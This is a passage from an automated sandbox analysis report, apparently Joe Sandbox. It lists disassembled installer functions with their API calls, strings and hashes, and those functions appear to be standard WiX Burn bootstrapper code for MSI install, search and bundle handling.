                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Close
                                                            • String ID:
                                                            • API String ID: 1979452859-0
                                                            • Opcode ID: 957f04aecb6d2aec60e8ab5a25420ceb45b62daee655640c4d0b2204e9558aeb
                                                            • Instruction ID: 32c7972c63274d0f33eddac32730523c5adbaf666985e842e6df28d84c28356f
                                                            • Opcode Fuzzy Hash: 957f04aecb6d2aec60e8ab5a25420ceb45b62daee655640c4d0b2204e9558aeb
                                                            • Instruction Fuzzy Hash: A1117036900A6AEF8B21AE988945AEFBB68FF04320B154179ED41A7311C7324E50D6D1
                                                            Function 008A5305 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,008A6213,00000001,00000364), ref: 008A5346
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 1a0722c8d5d0abb82b030d93bf44fb7ab266e79791077c9d0010a2692c1f0512
                                                            • Instruction ID: 473770bc7ffa2f549abdde3e2a92f5fdf624ecc3ebe79a23ed68a4fac0bcafe0
                                                            • Opcode Fuzzy Hash: 1a0722c8d5d0abb82b030d93bf44fb7ab266e79791077c9d0010a2692c1f0512
                                                            • Instruction Fuzzy Hash: A4F0BB321019286AFF111A655C05B5A3748FFC37F0B18A125B815D6A91CAF0DC8181A1
                                                            Function 008734B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00888BD3,0000001C,80070490,00000000,00000000,80070490), ref: 008734D5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FolderPath
                                                            • String ID:
                                                            • API String ID: 1514166925-0
                                                            • Opcode ID: d912521ac713853381149e4bb94e71ca5b00ffbe9604f77fe3f95a509405fc5e
                                                            • Instruction ID: 68567945a8909c7c73d01a846d3aceab2e106a4e0448086b374917ee5b7539c7
                                                            • Opcode Fuzzy Hash: d912521ac713853381149e4bb94e71ca5b00ffbe9604f77fe3f95a509405fc5e
                                                            • Instruction Fuzzy Hash: 6CE05BB22411257BEB122F755C05DEB7B9CFF15364700C051FE48D6114D772E55097B6
                                                            Function 008B2EFE Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNELBASE(00000000,00000000,0087556E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B2F0B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 4991031f6af29a9ecb9a9090e25fc7ea83454fb1e8deb1ac6d301dffda793d01
                                                            • Instruction ID: 4f57ecb77574c05649b798a43a8ad5925ac869aad06f248ece4a39011a8681b0
                                                            • Opcode Fuzzy Hash: 4991031f6af29a9ecb9a9090e25fc7ea83454fb1e8deb1ac6d301dffda793d01
                                                            • Instruction Fuzzy Hash: F7E0FEF1927229DE8B508F6ABD454527BB8FB28B40306430FB800D2220CBB0C4418FA0
                                                            Function 008B9684 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 008B966B
                                                              • Part of subcall function 008B998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008B9A09
                                                              • Part of subcall function 008B998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008B9A1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e67a7f0c8c861e21c47ef4d2c0bbf6ae18bcab126893683c7ce264b024c33823
                                                            • Instruction ID: 6a1e6d915c8b7b04e2fb013f0afceae3d9f2523a7407ea5ab720fe2f4e6b482e
                                                            • Opcode Fuzzy Hash: e67a7f0c8c861e21c47ef4d2c0bbf6ae18bcab126893683c7ce264b024c33823
                                                            • Instruction Fuzzy Hash: 73B01291268201BD3A8851882E83DB70B0CF5C1B11B31431FF2A1D1381E8840C054133
                                                            Function 008B9653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 008B966B
                                                              • Part of subcall function 008B998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008B9A09
                                                              • Part of subcall function 008B998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008B9A1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c79dad3cf58b235eeeea4c5c8454312f741a60fdea8a79252da7d4c778af028a
                                                            • Instruction ID: bdca32a7be0a7ea8f5cec5b92e773441e9831713e07d7ea30bc3829596e4d8fb
                                                            • Opcode Fuzzy Hash: c79dad3cf58b235eeeea4c5c8454312f741a60fdea8a79252da7d4c778af028a
                                                            • Instruction Fuzzy Hash: 70B01291268105BD3A4811446CC2CB70B0CF5C2B11B31831FF2A1E0381A8800C044233
                                                            Function 008B9674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 008B966B
                                                              • Part of subcall function 008B998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008B9A09
                                                              • Part of subcall function 008B998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008B9A1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: bc10bb8497eb2e4eb3987488dbff75524daa32f12c3a58a265597492c9f06db9
                                                            • Instruction ID: 8f8e1b1c5d7c59928e7ad15d7e7c4c295b4c6bae074c9bdffc8f8d06002204bb
                                                            • Opcode Fuzzy Hash: bc10bb8497eb2e4eb3987488dbff75524daa32f12c3a58a265597492c9f06db9
                                                            • Instruction Fuzzy Hash: 09B01291268002BD368851481C43CB70B0CF1C1B11331C31FF6A1C1381E8800C094133
                                                            Function 008714B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,008721A8,?,00000000,?,00000000,?,0087390C,00000000,?,00000104), ref: 008714E8
                                                              • Part of subcall function 00873BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BDB
                                                              • Part of subcall function 00873BD3: HeapSize.KERNEL32(00000000,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BE2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$ProcessSizelstrlen
                                                            • String ID:
                                                            • API String ID: 3492610842-0
                                                            • Opcode ID: 21c6c6ecafead7b8a92d10210c7ca6fb75bb770b30ac2b13dc55188568835482
                                                            • Instruction ID: 8a3ae30c3ade7efc66b888feea6beb481717333090121fe9e74edff1df9a6b9e
                                                            • Opcode Fuzzy Hash: 21c6c6ecafead7b8a92d10210c7ca6fb75bb770b30ac2b13dc55188568835482
                                                            • Instruction Fuzzy Hash: BF01263320022CABCF115E1CDC88F9AB76AFF84764F11C215FA1EDB955C631DC008695

                                                            Non-executed Functions

                                                            Function 0087A8F1 Relevance: 172.2, APIs: 29, Strings: 69, Instructions: 688COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysFreeString.OLEAUT32(?), ref: 0087B11C
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • CompareStringW.KERNEL32(0000007F,00000000,008BCA9C,000000FF,DirectorySearch,000000FF,008BCA9C,Condition,feclient.dll,008BCA9C,Variable,?,008BCA9C,008BCA9C,?,?), ref: 0087AA29
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0087AA7E
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,path,000000FF), ref: 0087AA9A
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,FileSearch,000000FF), ref: 0087AABE
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Type,?,?,Path,clbcatq.dll), ref: 0087AB11
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0087AB2B
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,RegistrySearch,000000FF), ref: 0087AB53
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCR,000000FF,?,Root,?), ref: 0087AB91
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKCU,000000FF), ref: 0087ABB0
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,HKLM,000000FF), ref: 0087ABCF
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exists,000000FF,?,Win64,msi.dll,?,Type,?,?,Value,version.dll,?), ref: 0087AC8D
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,value,000000FF), ref: 0087ACA7
                                                              • Part of subcall function 008B32F3: VariantInit.OLEAUT32(?), ref: 008B3309
                                                              • Part of subcall function 008B32F3: SysAllocString.OLEAUT32(?), ref: 008B3325
                                                              • Part of subcall function 008B32F3: VariantClear.OLEAUT32(?), ref: 008B33AC
                                                              • Part of subcall function 008B32F3: SysFreeString.OLEAUT32(00000000), ref: 008B33B7
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,numeric,000000FF,?,VariableType,?,?,ExpandEnvironment,cabinet.dll), ref: 0087AD06
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,string,000000FF), ref: 0087AD28
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 0087AD48
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,directory,000000FF), ref: 0087AE20
                                                            • SysFreeString.OLEAUT32(?), ref: 0087AFFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$Compare$Free$HeapVariant$AllocAllocateClearInitProcess
                                                            • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch$ExpandEnvironment$Failed to allocate memory for search structs.$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @FeatureId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FeatureId$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiFeatureSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$`<u$assignment$cabinet.dll$clbcatq.dll$comres.dll$directory$exists$feclient.dll$keyPath$language$msi.dll$numeric$path$search.cpp$state$string$value$version$version.dll$wininet.dll
                                                            • API String ID: 2748437055-56916464
                                                            • Opcode ID: 39e5ee75179c813bbb63726aaf9dd1eda48951a02c0ff129ee89967bdc161744
                                                            • Instruction ID: faa3123ca364713de47f35208bb20da7ebfa5ab28b9ee881d18124683216d12d
                                                            • Opcode Fuzzy Hash: 39e5ee75179c813bbb63726aaf9dd1eda48951a02c0ff129ee89967bdc161744
                                                            • Instruction Fuzzy Hash: 49228431D4862ABEDB219A548C46FEF7A65FB05734F208320F538F63D4DB64EA40D692
                                                            Function 008941EA Relevance: 43.0, Strings: 34, Instructions: 498COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • feclient.dll, xrefs: 008942C5, 0089434D, 0089441D, 0089454B, 008947D8
                                                            • REINSTALLMODE="vomus" REBOOT=ReallySuppress, xrefs: 008945F5
                                                            • Failed to add ADMIN property on admin install., xrefs: 0089471E
                                                            • Failed to add reboot suppression property on uninstall., xrefs: 0089477D
                                                            • Failed to add patch properties to argument string., xrefs: 008944FD
                                                            • REINSTALL=ALL, xrefs: 008945D3, 0089464D
                                                            • Failed to run maintanance mode for MSI package., xrefs: 008946F6
                                                            • Failed to add reinstall mode and reboot suppression properties on repair., xrefs: 0089469B
                                                            • Failed to initialize external UI handler., xrefs: 008943F4
                                                            • WixBundleExecutePackageCacheFolder, xrefs: 0089436A, 008948A4
                                                            • Failed to perform minor upgrade of MSI package., xrefs: 00894638
                                                            • Failed to add the list of dependencies to ignore to the properties., xrefs: 008946CA
                                                            • Failed to add feature action properties to obfuscated argument string., xrefs: 008944DB
                                                            • %ls %ls=ALL, xrefs: 008946B6, 00894795
                                                            • Failed to get cached path for package: %ls, xrefs: 0089434F
                                                            • ACTION=ADMIN, xrefs: 00894709
                                                            • Failed to add feature action properties to argument string., xrefs: 008944B9
                                                            • REBOOT=ReallySuppress, xrefs: 008945A0, 0089476C
                                                            • crypt32.dll, xrefs: 0089440A
                                                            • Failed to add obfuscated properties to argument string., xrefs: 00894497
                                                            • %ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress, xrefs: 00894687
                                                            • Failed to add reinstall mode and reboot suppression properties on minor upgrade., xrefs: 0089460C
                                                            • Failed to add reinstall all property on minor upgrade., xrefs: 008945EA
                                                            • Failed to uninstall MSI package., xrefs: 008947EF
                                                            • Failed to enable logging for package: %ls to: %ls, xrefs: 0089441F
                                                            • Failed to add reboot suppression property on install., xrefs: 008945BB
                                                            • IGNOREDEPENDENCIES, xrefs: 008946A5, 00894784
                                                            • Failed to add properties to argument string., xrefs: 00894463
                                                            • Failed to build MSI path., xrefs: 0089439D
                                                            • VersionString, xrefs: 0089428E, 008942EF
                                                            • msasn1.dll, xrefs: 0089440B
                                                            • Failed to install MSI package., xrefs: 00894746
                                                            • WixBundleExecutePackageAction, xrefs: 008943B7, 008948B4
                                                            • Failed to add patch properties to obfuscated argument string., xrefs: 0089451F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ACTION=ADMIN$ REBOOT=ReallySuppress$ REINSTALL=ALL$ REINSTALLMODE="vomus" REBOOT=ReallySuppress$%ls %ls=ALL$%ls%ls REINSTALLMODE="cmus%ls" REBOOT=ReallySuppress$Failed to add ADMIN property on admin install.$Failed to add feature action properties to argument string.$Failed to add feature action properties to obfuscated argument string.$Failed to add obfuscated properties to argument string.$Failed to add patch properties to argument string.$Failed to add patch properties to obfuscated argument string.$Failed to add properties to argument string.$Failed to add reboot suppression property on install.$Failed to add reboot suppression property on uninstall.$Failed to add reinstall all property on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on minor upgrade.$Failed to add reinstall mode and reboot suppression properties on repair.$Failed to add the list of dependencies to ignore to the properties.$Failed to build MSI path.$Failed to enable logging for package: %ls to: %ls$Failed to get cached path for package: %ls$Failed to initialize external UI handler.$Failed to install MSI package.$Failed to perform minor upgrade of MSI package.$Failed to run maintanance mode for MSI package.$Failed to uninstall MSI package.$IGNOREDEPENDENCIES$VersionString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$crypt32.dll$feclient.dll$msasn1.dll
                                                            • API String ID: 0-2033600224
                                                            • Opcode ID: 6fe4f696210e3a787e46d8d626c419c4d2dd91c38713f3f87edbe6bdf885593d
                                                            • Instruction ID: f12fe6ed24427368eb1276d0973e7397d10f17e8d5e113ce3ec486e7da0822ef
                                                            • Opcode Fuzzy Hash: 6fe4f696210e3a787e46d8d626c419c4d2dd91c38713f3f87edbe6bdf885593d
                                                            • Instruction Fuzzy Hash: E402B171940629AFDF21AEA8CC41FA9B77AFB54700F0841A5F518E7311D772EEA1CB81
                                                            Function 008B1719 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 337COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 008B17B1
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B17BB
                                                            • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 008B1808
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B180E
                                                            • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 008B1848
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B184E
                                                            • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 008B188E
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B1894
                                                            • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 008B18D4
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B18DA
                                                            • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 008B191A
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B1920
                                                            • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 008B1A11
                                                            • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 008B1A4B
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B1A55
                                                            • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 008B1A8D
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B1A97
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008B1AD0
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008B1ADA
                                                            • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 008B1B18
                                                            • LocalFree.KERNEL32(?), ref: 008B1B2E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                            • String ID: srputil.cpp
                                                            • API String ID: 267631441-4105181634
                                                            • Opcode ID: 28b310f472f580ed41ed076f1dbfa0fb3d1b792f7ca97c82e0dd9c9b8ae83d78
                                                            • Instruction ID: 91edcb0dc38a7673e8a6ce0fd7f7d13fca46df8bfa7a4ff459c00264fdd727e4
                                                            • Opcode Fuzzy Hash: 28b310f472f580ed41ed076f1dbfa0fb3d1b792f7ca97c82e0dd9c9b8ae83d78
                                                            • Instruction Fuzzy Hash: D7C14576D4123DABDB309B959C58BDFFAB8FF44750F4102AAA905FB240D7709D408EA0
                                                            Function 0089C332 Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 376COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 0089C385
                                                            • Failed to copy key for pseudo bundle., xrefs: 0089C542
                                                            • Failed to copy install arguments for related bundle package, xrefs: 0089C584
                                                            • Failed to allocate memory for dependency providers., xrefs: 0089C6DE
                                                            • Failed to copy download source for pseudo bundle., xrefs: 0089C469
                                                            • Failed to copy cache id for pseudo bundle., xrefs: 0089C55F
                                                            • -%ls, xrefs: 0089C34C
                                                            • pseudobundle.cpp, xrefs: 0089C379, 0089C3B2, 0089C4A1, 0089C6D2
                                                            • Failed to copy filename for pseudo bundle., xrefs: 0089C417
                                                            • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0089C3BE
                                                            • Failed to copy uninstall arguments for related bundle package, xrefs: 0089C623
                                                            • Failed to copy key for pseudo bundle payload., xrefs: 0089C3F3
                                                            • Failed to append relation type to repair arguments for related bundle package, xrefs: 0089C5F1
                                                            • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0089C4AD
                                                            • Failed to append relation type to uninstall arguments for related bundle package, xrefs: 0089C644
                                                            • Failed to copy version for pseudo bundle., xrefs: 0089C72D
                                                            • Failed to copy local source path for pseudo bundle., xrefs: 0089C43B
                                                            • Failed to append relation type to install arguments for related bundle package, xrefs: 0089C5A9
                                                            • Failed to copy repair arguments for related bundle package, xrefs: 0089C5D0
                                                            • Failed to copy display name for pseudo bundle., xrefs: 0089C74F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateProcess
